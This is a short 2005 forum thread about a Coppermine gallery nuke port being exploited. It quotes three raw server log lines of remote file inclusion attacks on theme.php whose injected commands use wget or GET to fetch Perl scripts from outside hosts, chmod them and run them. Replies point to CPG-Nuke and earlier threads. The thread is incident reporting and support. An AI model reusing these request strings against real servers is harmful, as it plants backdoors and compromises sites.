getting hacked

[mrmike987]

gogclan.com on Server 102 was suspended for
Website Exploit - Coppermine is being exploited, and has been over the past couple of weeks.

Location of Documentation Logs:
Yes, see notes below

Comments added in WHM:
Yes.


Was Client Notified:
Yes, through this suspension.

Any additional notes:
gogclan.com:200.164.108.163 - - [30/Jun/2005:16:40:47 -0400] "GET //modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://newton.100free.com/newcmd.gif?&cmd=cd%20/tmp;wget%20www.bo0mber.oi.com.br/bd.pl HTTP/1.0" 200 12891 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

gogclan.com:200.210.219.171 - - [02/Jul/2005:03:12:49 -0400] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://psc.yoll.net/cmd?&cmd=cd%20/var/tmp;%20GET%20http://geocities.yahoo.com.br/wdteam/beto.txt%20>%20beto.txt;%20chmod%20777%20beto.txtl;%20perl%20beto.txt HTTP/1.0" 200 14798 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.40607)"

gogclan.com:200.165.181.247 - - [06/Jul/2005:15:08:28 -0400] "GET //modules/coppermine/themes/default/theme.php?THEME_DIR=http://mi.verizon.net.do/carlos18/tool25.dot?&cmd=cd%20/tmp;wget%20www.bo0mber.oi.com.br/bd.pl HTTP/1.1" 200 12936 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

[kegobeer]

There is no support for the nuke port of Coppermine.  If you want Coppermine with nuke, you have to use CPG-Nuke.  A google search for coppermine nuke exploit turned up a link to cpgnuke anyway:

http://www.cpgnuke.com/Forums/viewtopic/t=3580.html

The standalone version has no known security holes.  Switch to CPG-Nuke if you want to continue using Coppermine with nuke.

[Joachim Müller]

searching before posting would have helped as well: http://forum.coppermine-gallery.net/index.php?topic=5879.0